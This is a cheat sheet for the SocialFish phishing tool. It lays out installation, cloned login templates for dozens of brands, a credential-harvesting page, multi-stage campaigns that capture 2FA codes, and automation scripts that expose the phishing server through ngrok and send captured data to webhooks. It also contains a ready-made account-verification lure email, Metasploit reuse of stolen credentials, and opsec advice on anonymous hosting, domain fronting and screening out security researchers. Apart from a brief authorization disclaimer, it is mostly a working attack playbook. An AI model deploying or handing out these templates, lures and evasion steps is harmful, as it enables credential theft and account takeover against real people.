Appearance
SocialFish Phishing Tool Cheat Sheet
Overview
SocialFish is an advanced phishing tool and information collector developed by UndeadSec. It specializes in social media phishing attacks and comprehensive information gathering, providing automated phishing page generation, real-time credential harvesting, and detailed victim profiling. SocialFish includes built-in templates for popular social media platforms and supports custom phishing page creation.
⚠️ Warning: This tool is intended for authorized penetration testing and red team exercises only. Ensure you have proper authorization before using against any target.
Installation
Prerequisites
bash
# Install Python 3.6+ and pip
sudo apt update
sudo apt install -y python3 python3-pip git
# Install system dependencies
sudo apt install -y build-essential libssl-dev libffi-dev python3-dev
# Verify Python installation
python3 --versionInstallation from GitHub
bash
# Clone SocialFish repository
git clone https://github.com/UndeadSec/SocialFish.git
cd SocialFish
# Install requirements
pip3 install -r requirements.txt
# Make executable
chmod +x SocialFish.pyDocker Installation
bash
# Clone repository
git clone https://github.com/UndeadSec/SocialFish.git
cd SocialFish
# Build Docker image
docker build -t socialfish .
# Run SocialFish container
docker run -it --rm -p 5000:5000 socialfish
# Run with persistent data
docker run -it --rm -p 5000:5000 -v $(pwd)/data:/app/data socialfishManual Dependencies Installation
bash
# Install individual dependencies
pip3 install flask
pip3 install requests
pip3 install beautifulsoup4
pip3 install colorama
pip3 install pyfiglet
pip3 install urllib3
# Install additional tools
sudo apt install -y ngrok # For public tunneling
sudo apt install -y apache2 # Alternative web serverBasic Usage
Starting SocialFish
bash
# Start SocialFish with default settings
python3 SocialFish.py
# Start with custom port
python3 SocialFish.py --port 8080
# Start with custom host
python3 SocialFish.py --host 0.0.0.0
# Start in debug mode
python3 SocialFish.py --debug
# Start with custom template directory
python3 SocialFish.py --templates /path/to/templatesCommand Line Options
bash
# SocialFish command line options
python3 SocialFish.py --help
Options:
--port PORT Port to run the server (default: 5000)
--host HOST Host to bind the server (default: 127.0.0.1)
--debug Enable debug mode
--templates DIR Custom templates directory
--output DIR Output directory for logs and data
--ngrok Enable ngrok tunneling
--ssl Enable SSL/HTTPSWeb Interface Access
bash
# Access SocialFish web interface
http://localhost:5000
# Access admin panel
http://localhost:5000/admin
# View captured data
http://localhost:5000/logs
# Download captured data
http://localhost:5000/downloadBuilt-in Templates
Social Media Platforms
bash
# Available social media templates
1. Facebook Login
2. Instagram Login
3. Twitter Login
4. LinkedIn Login
5. Snapchat Login
6. TikTok Login
7. WhatsApp Web
8. Telegram Web
9. Discord Login
10. Reddit LoginEmail and Cloud Services
bash
# Email service templates
11. Gmail Login
12. Outlook Login
13. Yahoo Mail Login
14. ProtonMail Login
# Cloud service templates
15. Google Drive
16. Dropbox Login
17. OneDrive Login
18. iCloud LoginProfessional and Business
bash
# Business platform templates
19. Microsoft Teams
20. Slack Login
21. Zoom Login
22. Skype Login
23. Adobe Creative Cloud
24. Salesforce LoginGaming and Entertainment
bash
# Gaming platform templates
25. Steam Login
26. Epic Games
27. PlayStation Network
28. Xbox Live
29. Twitch Login
30. YouTube LoginFinancial and Shopping
bash
# Financial service templates
31. PayPal Login
32. Amazon Login
33. eBay Login
34. Netflix Login
35. Spotify LoginTemplate Management
Using Built-in Templates
bash
# Select template from web interface
1. Access http://localhost:5000
2. Choose target platform
3. Configure template settings
4. Generate phishing page
5. Start campaign
# Command line template selection
python3 SocialFish.py --template facebook
python3 SocialFish.py --template instagram
python3 SocialFish.py --template gmailCustom Template Creation
html
<!-- custom_template.html -->
<!DOCTYPE html>
<html>
<head>
<title>{{title}}</title>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<link rel="stylesheet" href="{{css_file}}">
</head>
<body>
<div class="login-container">
<div class="logo">
<img src="{{logo_url}}" alt="Logo">
</div>
<form method="POST" action="/login">
<div class="form-group">
<input type="text" name="username" placeholder="Username or Email" required>
</div>
<div class="form-group">
<input type="password" name="password" placeholder="Password" required>
</div>
<div class="form-group">
<button type="submit">Sign In</button>
</div>
</form>
<div class="additional-info">
<p>Forgot your password? <a href="#" onclick="collectInfo()">Reset here</a></p>
</div>
</div>
<script>
function collectInfo() {
// Additional information collection
var userAgent = navigator.userAgent;
var platform = navigator.platform;
var language = navigator.language;
// Send data to server
fetch('/collect', {
method: 'POST',
headers: {
'Content-Type': 'application/json',
},
body: JSON.stringify({
userAgent: userAgent,
platform: platform,
language: language,
timestamp: new Date().toISOString()
})
});
}
// Automatic information collection
window.onload = function() {
collectInfo();
};
</script>
</body>
</html>Template Configuration
json
{
"template_name": "custom_platform",
"display_name": "Custom Platform Login",
"description": "Custom phishing template for specific platform",
"author": "Security Tester",
"version": "1.0",
"target_url": "https://custom-platform.com/login",
"redirect_url": "https://custom-platform.com/dashboard",
"files": {
"html": "custom_template.html",
"css": "custom_styles.css",
"js": "custom_script.js",
"images": ["logo.png", "background.jpg"]
},
"form_fields": [
{
"name": "username",
"type": "text",
"required": true,
"label": "Username or Email"
},
{
"name": "password",
"type": "password",
"required": true,
"label": "Password"
}
],
"additional_data": [
"user_agent",
"ip_address",
"geolocation",
"browser_info",
"screen_resolution"
]
}Campaign Management
Creating Campaigns
bash
# Web interface campaign creation
1. Access admin panel: http://localhost:5000/admin
2. Select "New Campaign"
3. Choose template
4. Configure settings:
- Campaign name
- Target URL
- Redirect URL
- Data collection options
5. Generate phishing URL
6. Start campaignCampaign Configuration Options
python
# Campaign configuration example
campaign_config = {
"name": "Social Media Test Campaign",
"template": "facebook",
"target_platform": "Facebook",
"redirect_url": "https://facebook.com",
"data_collection": {
"credentials": True,
"browser_info": True,
"geolocation": True,
"device_info": True,
"session_data": True
},
"security": {
"ip_filtering": ["192.168.1.0/24"],
"user_agent_filtering": True,
"geo_filtering": ["US", "CA", "GB"],
"time_restrictions": {
"start_time": "09:00",
"end_time": "17:00",
"timezone": "UTC"
}
},
"notifications": {
"webhook_url": "https://your-server.com/webhook",
"email_alerts": True,
"slack_integration": True
}
}Advanced Campaign Features
python
# Multi-stage phishing campaign
multi_stage_config = {
"stages": [
{
"stage": 1,
"template": "email_verification",
"description": "Email verification page",
"data_collection": ["email", "browser_info"],
"redirect_to_stage": 2
},
{
"stage": 2,
"template": "facebook_login",
"description": "Facebook login page",
"data_collection": ["credentials", "session_data"],
"redirect_to_stage": 3
},
{
"stage": 3,
"template": "2fa_verification",
"description": "Two-factor authentication",
"data_collection": ["2fa_code", "device_info"],
"redirect_url": "https://facebook.com"
}
]
}Data Collection and Analysis
Captured Data Types
bash
# Credential data
- Username/Email
- Password
- Security questions
- PIN codes
- 2FA tokens
# Browser information
- User Agent
- Browser version
- Installed plugins
- Screen resolution
- Operating system
# Network information
- IP address
- Geolocation
- ISP information
- Proxy detection
- VPN detection
# Device information
- Device type
- Hardware specs
- Mobile device info
- Battery level
- Network type
# Behavioral data
- Mouse movements
- Keystroke patterns
- Time spent on page
- Click patterns
- Form interactionReal-time Monitoring
python
# Real-time data monitoring script
import requests
import json
import time
from datetime import datetime
class SocialFishMonitor:
def __init__(self, base_url="http://localhost:5000"):
self.base_url = base_url
self.last_check = datetime.now()
def get_captured_data(self):
"""Retrieve captured data from SocialFish"""
try:
response = requests.get(f"{self.base_url}/api/data")
if response.status_code == 200:
return response.json()
except Exception as e:
print(f"Error retrieving data: {e}")
return []
def monitor_new_captures(self):
"""Monitor for new captured data"""
while True:
data = self.get_captured_data()
new_captures = [
item for item in data
if datetime.fromisoformat(item['timestamp']) > self.last_check
]
for capture in new_captures:
self.process_new_capture(capture)
if new_captures:
self.last_check = datetime.now()
time.sleep(10)
def process_new_capture(self, capture):
"""Process new captured data"""
print(f"[+] New capture: {capture['type']}")
print(f" IP: {capture.get('ip_address', 'Unknown')}")
print(f" User Agent: {capture.get('user_agent', 'Unknown')}")
print(f" Timestamp: {capture['timestamp']}")
# Send notifications
self.send_notification(capture)
# Export data
self.export_capture(capture)
def send_notification(self, capture):
"""Send notification for new capture"""
webhook_url = "https://your-server.com/webhook"
payload = {
"text": f"New SocialFish capture from {capture.get('ip_address', 'Unknown')}",
"capture_data": capture
}
try:
requests.post(webhook_url, json=payload)
except Exception as e:
print(f"Failed to send notification: {e}")
def export_capture(self, capture):
"""Export captured data"""
timestamp = datetime.now().strftime("%Y%m%d_%H%M%S")
filename = f"capture_{timestamp}.json"
with open(filename, 'w') as f:
json.dump(capture, f, indent=2)
print(f"[+] Data exported to: {filename}")
# Usage
monitor = SocialFishMonitor()
monitor.monitor_new_captures()Data Analysis Tools
python
# Data analysis and reporting
import pandas as pd
import matplotlib.pyplot as plt
import seaborn as sns
from collections import Counter
class SocialFishAnalyzer:
def __init__(self, data_file):
self.data = pd.read_json(data_file)
def analyze_geographic_distribution(self):
"""Analyze geographic distribution of victims"""
country_counts = Counter(self.data['country'])
plt.figure(figsize=(12, 6))
countries = list(country_counts.keys())[:10]
counts = list(country_counts.values())[:10]
plt.bar(countries, counts)
plt.title('Geographic Distribution of Phishing Victims')
plt.xlabel('Country')
plt.ylabel('Number of Victims')
plt.xticks(rotation=45)
plt.tight_layout()
plt.savefig('geographic_distribution.png')
plt.show()
def analyze_browser_usage(self):
"""Analyze browser usage patterns"""
browsers = []
for ua in self.data['user_agent']:
if 'Chrome' in ua:
browsers.append('Chrome')
elif 'Firefox' in ua:
browsers.append('Firefox')
elif 'Safari' in ua:
browsers.append('Safari')
elif 'Edge' in ua:
browsers.append('Edge')
else:
browsers.append('Other')
browser_counts = Counter(browsers)
plt.figure(figsize=(8, 8))
plt.pie(browser_counts.values(), labels=browser_counts.keys(), autopct='%1.1f%%')
plt.title('Browser Usage Distribution')
plt.savefig('browser_distribution.png')
plt.show()
def analyze_time_patterns(self):
"""Analyze time-based patterns"""
self.data['timestamp'] = pd.to_datetime(self.data['timestamp'])
self.data['hour'] = self.data['timestamp'].dt.hour
hourly_counts = self.data['hour'].value_counts().sort_index()
plt.figure(figsize=(12, 6))
plt.plot(hourly_counts.index, hourly_counts.values, marker='o')
plt.title('Phishing Activity by Hour of Day')
plt.xlabel('Hour of Day')
plt.ylabel('Number of Victims')
plt.grid(True)
plt.savefig('time_patterns.png')
plt.show()
def generate_report(self):
"""Generate comprehensive analysis report"""
report = {
'total_victims': len(self.data),
'unique_ips': self.data['ip_address'].nunique(),
'top_countries': dict(Counter(self.data['country']).most_common(5)),
'success_rate': len(self.data[self.data['credentials_captured'] == True]) / len(self.data) * 100,
'average_time_on_page': self.data['time_on_page'].mean(),
'mobile_percentage': len(self.data[self.data['device_type'] == 'mobile']) / len(self.data) * 100
}
return report
# Usage
analyzer = SocialFishAnalyzer('captured_data.json')
report = analyzer.generate_report()
print(json.dumps(report, indent=2))Automation and Scripting
Python Automation Script
python
#!/usr/bin/env python3
# SocialFish automation script
import requests
import json
import time
import subprocess
import threading
from datetime import datetime
class SocialFishAutomation:
def __init__(self, host="localhost", port=5000):
self.base_url = f"http://{host}:{port}"
self.process = None
self.monitoring = False
def start_socialfish(self, template="facebook"):
"""Start SocialFish with specified template"""
cmd = [
"python3", "SocialFish.py",
"--host", "0.0.0.0",
"--port", str(self.port),
"--template", template
]
self.process = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
# Wait for server to start
time.sleep(10)
# Verify server is running
try:
response = requests.get(self.base_url, timeout=5)
if response.status_code == 200:
print("[+] SocialFish started successfully")
return True
except:
pass
print("[-] Failed to start SocialFish")
return False
def create_campaign(self, config):
"""Create new phishing campaign"""
try:
response = requests.post(f"{self.base_url}/api/campaign", json=config)
if response.status_code == 200:
campaign_data = response.json()
print(f"[+] Campaign created: {campaign_data['url']}")
return campaign_data
except Exception as e:
print(f"[-] Failed to create campaign: {e}")
return None
def get_phishing_url(self, campaign_id):
"""Get phishing URL for campaign"""
try:
response = requests.get(f"{self.base_url}/api/campaign/{campaign_id}")
if response.status_code == 200:
return response.json()['url']
except Exception as e:
print(f"[-] Failed to get phishing URL: {e}")
return None
def monitor_captures(self):
"""Monitor captured data in real-time"""
self.monitoring = True
last_count = 0
while self.monitoring:
try:
response = requests.get(f"{self.base_url}/api/captures")
if response.status_code == 200:
captures = response.json()
current_count = len(captures)
if current_count > last_count:
new_captures = captures[last_count:]
for capture in new_captures:
self.process_capture(capture)
last_count = current_count
time.sleep(5)
except Exception as e:
print(f"[-] Monitoring error: {e}")
time.sleep(10)
def process_capture(self, capture):
"""Process new captured data"""
print(f"[+] New victim: {capture.get('ip_address', 'Unknown')}")
# Extract credentials if available
if 'credentials' in capture:
username = capture['credentials'].get('username', 'N/A')
password = capture['credentials'].get('password', 'N/A')
print(f" Username: {username}")
print(f" Password: {'*' * len(password)}")
# Extract device information
if 'device_info' in capture:
device = capture['device_info']
print(f" Device: {device.get('type', 'Unknown')} - {device.get('os', 'Unknown')}")
print(f" Browser: {device.get('browser', 'Unknown')}")
# Send notification
self.send_notification(capture)
# Export data
self.export_capture(capture)
def send_notification(self, capture):
"""Send notification for new capture"""
# Slack notification
slack_webhook = "https://hooks.slack.com/services/YOUR/SLACK/WEBHOOK"
message = {
"text": f"🎣 New SocialFish Capture",
"attachments": [
{
"color": "good",
"fields": [
{
"title": "IP Address",
"value": capture.get('ip_address', 'Unknown'),
"short": True
},
{
"title": "Country",
"value": capture.get('country', 'Unknown'),
"short": True
},
{
"title": "User Agent",
"value": capture.get('user_agent', 'Unknown')[:50] + "...",
"short": False
}
]
}
]
}
try:
requests.post(slack_webhook, json=message)
except Exception as e:
print(f"[-] Failed to send Slack notification: {e}")
def export_capture(self, capture):
"""Export captured data to file"""
timestamp = datetime.now().strftime("%Y%m%d_%H%M%S")
filename = f"socialfish_capture_{timestamp}.json"
with open(filename, 'w') as f:
json.dump(capture, f, indent=2)
print(f"[+] Data exported to: {filename}")
def setup_ngrok_tunnel(self):
"""Setup ngrok tunnel for public access"""
try:
# Start ngrok tunnel
ngrok_process = subprocess.Popen([
"ngrok", "http", str(self.port)
], stdout=subprocess.PIPE, stderr=subprocess.PIPE)
time.sleep(5)
# Get public URL
response = requests.get("http://localhost:4040/api/tunnels")
if response.status_code == 200:
tunnels = response.json()['tunnels']
if tunnels:
public_url = tunnels[0]['public_url']
print(f"[+] Public URL: {public_url}")
return public_url
except Exception as e:
print(f"[-] Failed to setup ngrok tunnel: {e}")
return None
def automated_campaign(self, templates, duration_hours=24):
"""Run automated multi-template campaign"""
print("[+] Starting automated SocialFish campaign...")
# Setup ngrok tunnel
public_url = self.setup_ngrok_tunnel()
campaigns = []
# Create campaigns for each template
for template in templates:
config = {
"template": template,
"name": f"Auto Campaign - {template}",
"redirect_url": f"https://{template.lower()}.com",
"data_collection": {
"credentials": True,
"browser_info": True,
"geolocation": True
}
}
campaign = self.create_campaign(config)
if campaign:
campaigns.append(campaign)
print(f"[+] {template} campaign URL: {public_url}{campaign['path']}")
# Start monitoring
monitor_thread = threading.Thread(target=self.monitor_captures)
monitor_thread.daemon = True
monitor_thread.start()
# Run for specified duration
print(f"[+] Campaign running for {duration_hours} hours...")
time.sleep(duration_hours * 3600)
# Stop monitoring
self.monitoring = False
print("[+] Campaign completed")
return campaigns
# Usage example
def main():
automation = SocialFishAutomation()
# Start SocialFish
if automation.start_socialfish():
# Run automated campaign with multiple templates
templates = ["facebook", "instagram", "gmail", "linkedin"]
campaigns = automation.automated_campaign(templates, duration_hours=1)
print(f"[+] Completed {len(campaigns)} campaigns")
if __name__ == "__main__":
main()Bash Automation Script
bash
#!/bin/bash
# SocialFish bash automation script
SOCIALFISH_DIR="/path/to/SocialFish"
HOST="0.0.0.0"
PORT="5000"
TEMPLATE="facebook"
DURATION="3600" # 1 hour in seconds
# Function to start SocialFish
start_socialfish() {
echo "[+] Starting SocialFish..."
cd "$SOCIALFISH_DIR"
python3 SocialFish.py --host "$HOST" --port "$PORT" --template "$TEMPLATE" &
SOCIALFISH_PID=$!
# Wait for server to start
sleep 10
# Check if server is running
if curl -s "http://localhost:$PORT" > /dev/null; then
echo "[+] SocialFish started successfully (PID: $SOCIALFISH_PID)"
return 0
else
echo "[-] Failed to start SocialFish"
return 1
fi
}
# Function to setup ngrok tunnel
setup_ngrok() {
echo "[+] Setting up ngrok tunnel..."
ngrok http "$PORT" &
NGROK_PID=$!
sleep 5
# Get public URL
PUBLIC_URL=$(curl -s http://localhost:4040/api/tunnels | jq -r '.tunnels[0].public_url')
if [ "$PUBLIC_URL" != "null" ] && [ -n "$PUBLIC_URL" ]; then
echo "[+] Public URL: $PUBLIC_URL"
echo "$PUBLIC_URL" > ngrok_url.txt
return 0
else
echo "[-] Failed to get ngrok URL"
return 1
fi
}
# Function to monitor captures
monitor_captures() {
echo "[+] Starting capture monitoring..."
while true; do
# Check for new captures
CAPTURE_COUNT=$(curl -s "http://localhost:$PORT/api/captures" | jq length)
if [ "$CAPTURE_COUNT" -gt 0 ]; then
echo "[+] $CAPTURE_COUNT capture(s) detected"
# Export latest capture
TIMESTAMP=$(date +"%Y%m%d_%H%M%S")
curl -s "http://localhost:$PORT/api/captures" > "captures_$TIMESTAMP.json"
echo "[+] Captures exported to: captures_$TIMESTAMP.json"
fi
sleep 30
done
}
# Function to cleanup
cleanup() {
echo "[+] Cleaning up..."
if [ -n "$SOCIALFISH_PID" ]; then
kill "$SOCIALFISH_PID" 2>/dev/null
echo "[+] SocialFish stopped"
fi
if [ -n "$NGROK_PID" ]; then
kill "$NGROK_PID" 2>/dev/null
echo "[+] Ngrok tunnel stopped"
fi
exit 0
}
# Set trap for cleanup
trap cleanup SIGINT SIGTERM
# Main execution
main() {
echo "[+] SocialFish Automation Script"
echo "[+] Template: $TEMPLATE"
echo "[+] Duration: $DURATION seconds"
# Start SocialFish
if start_socialfish; then
# Setup ngrok tunnel
if setup_ngrok; then
# Start monitoring in background
monitor_captures &
MONITOR_PID=$!
# Run for specified duration
echo "[+] Campaign running for $DURATION seconds..."
sleep "$DURATION"
# Stop monitoring
kill "$MONITOR_PID" 2>/dev/null
echo "[+] Campaign completed"
fi
fi
cleanup
}
# Execute main function
mainPowerShell Automation
powershell
# SocialFish PowerShell automation script
param(
[string]$SocialFishPath = "C:\Tools\SocialFish",
[string]$Host = "0.0.0.0",
[int]$Port = 5000,
[string]$Template = "facebook",
[int]$DurationMinutes = 60
)
function Start-SocialFish {
param(
[string]$Path,
[string]$Host,
[int]$Port,
[string]$Template
)
Write-Host "[+] Starting SocialFish..." -ForegroundColor Green
Set-Location $Path
$process = Start-Process -FilePath "python" -ArgumentList @(
"SocialFish.py",
"--host", $Host,
"--port", $Port,
"--template", $Template
) -PassThru -WindowStyle Hidden
# Wait for server to start
Start-Sleep -Seconds 10
# Check if server is running
try {
$response = Invoke-WebRequest -Uri "http://localhost:$Port" -TimeoutSec 5
if ($response.StatusCode -eq 200) {
Write-Host "[+] SocialFish started successfully (PID: $($process.Id))" -ForegroundColor Green
return $process
}
}
catch {
Write-Host "[-] Failed to start SocialFish" -ForegroundColor Red
return $null
}
}
function Start-NgrokTunnel {
param([int]$Port)
Write-Host "[+] Setting up ngrok tunnel..." -ForegroundColor Green
$ngrokProcess = Start-Process -FilePath "ngrok" -ArgumentList @("http", $Port) -PassThru -WindowStyle Hidden
Start-Sleep -Seconds 5
try {
$tunnelInfo = Invoke-RestMethod -Uri "http://localhost:4040/api/tunnels"
$publicUrl = $tunnelInfo.tunnels[0].public_url
if ($publicUrl) {
Write-Host "[+] Public URL: $publicUrl" -ForegroundColor Green
$publicUrl | Out-File -FilePath "ngrok_url.txt"
return @{
Process = $ngrokProcess
Url = $publicUrl
}
}
}
catch {
Write-Host "[-] Failed to get ngrok URL" -ForegroundColor Red
}
return $null
}
function Monitor-Captures {
param(
[int]$Port,
[int]$DurationMinutes
)
Write-Host "[+] Starting capture monitoring for $DurationMinutes minutes..." -ForegroundColor Green
$endTime = (Get-Date).AddMinutes($DurationMinutes)
$lastCaptureCount = 0
while ((Get-Date) -lt $endTime) {
try {
$captures = Invoke-RestMethod -Uri "http://localhost:$Port/api/captures"
$currentCount = $captures.Count
if ($currentCount -gt $lastCaptureCount) {
$newCaptures = $currentCount - $lastCaptureCount
Write-Host "[+] $newCaptures new capture(s) detected" -ForegroundColor Yellow
# Export captures
$timestamp = Get-Date -Format "yyyyMMdd_HHmmss"
$filename = "captures_$timestamp.json"
$captures | ConvertTo-Json -Depth 10 | Out-File -FilePath $filename
Write-Host "[+] Captures exported to: $filename" -ForegroundColor Green
$lastCaptureCount = $currentCount
}
}
catch {
Write-Host "[-] Error monitoring captures: $_" -ForegroundColor Red
}
Start-Sleep -Seconds 30
}
Write-Host "[+] Monitoring completed" -ForegroundColor Green
}
function Stop-Processes {
param(
[System.Diagnostics.Process]$SocialFishProcess,
[System.Diagnostics.Process]$NgrokProcess
)
Write-Host "[+] Cleaning up..." -ForegroundColor Green
if ($SocialFishProcess -and !$SocialFishProcess.HasExited) {
$SocialFishProcess.Kill()
Write-Host "[+] SocialFish stopped" -ForegroundColor Green
}
if ($NgrokProcess -and !$NgrokProcess.HasExited) {
$NgrokProcess.Kill()
Write-Host "[+] Ngrok tunnel stopped" -ForegroundColor Green
}
}
# Main execution
try {
Write-Host "[+] SocialFish PowerShell Automation" -ForegroundColor Cyan
Write-Host "[+] Template: $Template" -ForegroundColor Cyan
Write-Host "[+] Duration: $DurationMinutes minutes" -ForegroundColor Cyan
# Start SocialFish
$socialFishProcess = Start-SocialFish -Path $SocialFishPath -Host $Host -Port $Port -Template $Template
if ($socialFishProcess) {
# Setup ngrok tunnel
$ngrokInfo = Start-NgrokTunnel -Port $Port
if ($ngrokInfo) {
# Monitor captures
Monitor-Captures -Port $Port -DurationMinutes $DurationMinutes
# Cleanup
Stop-Processes -SocialFishProcess $socialFishProcess -NgrokProcess $ngrokInfo.Process
}
else {
Stop-Processes -SocialFishProcess $socialFishProcess
}
}
}
catch {
Write-Host "[-] Script error: $_" -ForegroundColor Red
}
finally {
Write-Host "[+] Script completed" -ForegroundColor Green
}Integration with Other Tools
GoPhish Integration
python
# Integrate SocialFish with GoPhish for email delivery
import requests
import json
class GoPhishSocialFishIntegration:
def __init__(self, gophish_url, gophish_api_key, socialfish_url):
self.gophish_url = gophish_url
self.gophish_api_key = gophish_api_key
self.socialfish_url = socialfish_url
self.headers = {
'Authorization': f'Bearer {gophish_api_key}',
'Content-Type': 'application/json'
}
def create_gophish_campaign(self, socialfish_campaign_url):
"""Create GoPhish campaign with SocialFish URL"""
campaign_data = {
"name": "SocialFish Integration Campaign",
"template": {
"name": "Social Media Login Required",
"subject": "Action Required: Verify Your Account",
"html": f"""
<html>
<body>
<h2>Account Verification Required</h2>
<p>We've detected unusual activity on your account. Please verify your identity to continue using our services.</p>
<p><a href="{socialfish_campaign_url}" style="background-color: #4CAF50; color: white; padding: 14px 20px; text-decoration: none; display: inline-block;">Verify Account</a></p>
<p>If you did not request this verification, please ignore this email.</p>
</body>
</html>
""",
"text": f"Please verify your account by visiting: {socialfish_campaign_url}"
},
"page": {
"name": "Social Media Landing",
"html": f'<script>window.location.href="{socialfish_campaign_url}";</script>',
"redirect_url": socialfish_campaign_url
},
"smtp": {
"name": "Default SMTP",
"host": "smtp.gmail.com:587",
"username": "your_email@gmail.com",
"password": "your_app_password"
},
"groups": [
{
"name": "Target Group",
"targets": [
{"email": "target1@example.com", "first_name": "John", "last_name": "Doe"},
{"email": "target2@example.com", "first_name": "Jane", "last_name": "Smith"}
]
}
]
}
response = requests.post(
f"{self.gophish_url}/api/campaigns",
headers=self.headers,
json=campaign_data
)
return response.json()
# Usage
integration = GoPhishSocialFishIntegration(
"http://localhost:3333",
"your_gophish_api_key",
"http://your-socialfish-url.com"
)
campaign = integration.create_gophish_campaign("http://your-socialfish-url.com/facebook")SET Integration
bash
# Social Engineering Toolkit integration
# Use SET for payload delivery after credential capture
# SET configuration for SocialFish integration
echo "
[+] SET Integration with SocialFish
1. Use SocialFish for credential harvesting
2. Use SET for payload delivery post-compromise
3. Combine social media phishing with malware delivery
"
# Example SET payload generation
setoolkit
# Select: Social-Engineering Attacks
# Select: Website Attack Vectors
# Select: Credential Harvester Attack Method
# Select: Custom Import
# Import SocialFish captured credentialsMetasploit Integration
bash
# Use captured credentials in Metasploit modules
# After SocialFish captures credentials, use them for further exploitation
# Example: Use captured email credentials
use auxiliary/scanner/http/owa_login
set RHOSTS target-mail-server.com
set USERNAME captured_username@company.com
set PASSWORD captured_password
run
# Example: Use captured social media tokens
use auxiliary/gather/facebook_api
set ACCESS_TOKEN captured_facebook_token
runOperational Security
Infrastructure Security
bash
# Use VPS with anonymous payment
# Implement proxy chains
# Use domain fronting
# Regular infrastructure rotation
# Example secure deployment
# 1. Purchase VPS with cryptocurrency
# 2. Setup through Tor/VPN
# 3. Use legitimate domain names
# 4. Implement SSL certificates
# 5. Configure proper loggingTraffic Obfuscation
bash
# Use legitimate SSL certificates
# Implement realistic timing delays
# Use common ports (80, 443)
# Mimic legitimate traffic patterns
# Example nginx configuration for traffic obfuscation
server {
listen 443 ssl;
server_name legitimate-looking-domain.com;
ssl_certificate /path/to/legitimate/cert.pem;
ssl_certificate_key /path/to/legitimate/key.pem;
location / {
proxy_pass http://localhost:5000;
proxy_set_header Host $host;
proxy_set_header X-Real-IP $remote_addr;
}
}Anti-Detection Measures
python
# Implement anti-detection features
anti_detection_config = {
"user_agent_filtering": True,
"ip_geolocation_filtering": True,
"security_tool_detection": True,
"honeypot_detection": True,
"timing_randomization": True,
"content_randomization": True
}
# Example anti-detection implementation
def detect_security_tools(user_agent, ip_address):
"""Detect security tools and researchers"""
security_indicators = [
'curl', 'wget', 'python-requests', 'scanner',
'bot', 'crawler', 'security', 'research'
]
for indicator in security_indicators:
if indicator.lower() in user_agent.lower():
return True
# Check for known security company IP ranges
security_ip_ranges = [
'192.168.1.0/24', # Example security company range
'10.0.0.0/8' # Example research network
]
# Implementation would check IP against ranges
return FalseTroubleshooting
Common Issues
bash
# Port already in use
sudo netstat -tulpn | grep :5000
sudo kill -9 $(sudo lsof -t -i:5000)
# Python dependency issues
pip3 install --upgrade -r requirements.txt
# Template not loading
# Check template file permissions
# Verify template syntax
# Check Flask template directory
# Ngrok tunnel issues
# Check ngrok authentication
# Verify port forwarding
# Test local connectivity firstDebug Mode
bash
# Enable debug logging
python3 SocialFish.py --debug
# Check Flask logs
tail -f socialfish.log
# Test template rendering
curl -v http://localhost:5000/facebook
# Verify API endpoints
curl http://localhost:5000/api/capturesBest Practices
Campaign Planning
- Target research: Understand target demographics and social media usage
- Template selection: Choose appropriate templates for target audience
- Infrastructure setup: Use secure and anonymous hosting
- Testing: Thoroughly test templates before deployment
- Monitoring: Implement real-time capture monitoring
Legal and Ethical Considerations
bash
# Authorized testing only
# Obtain proper written authorization
# Follow responsible disclosure
# Protect captured data
# Document all activities
# Data protection measures
# Encrypt captured credentials
# Secure data transmission
# Implement data retention policies
# Regular security auditsPerformance Optimization
bash
# Optimize for high traffic
# Use CDN for static content
# Implement caching
# Monitor server resources
# Scale horizontally if needed
# Example performance monitoring
htop
iotop
netstat -tulpn
df -hResources
- SocialFish GitHub Repository
- UndeadSec Security Research
- Flask Documentation
- OWASP Social Engineering Guide
- Anti-Phishing Working Group
This cheat sheet provides a comprehensive reference for using SocialFish phishing tool. Always ensure you have proper authorization before conducting phishing simulations or penetration testing.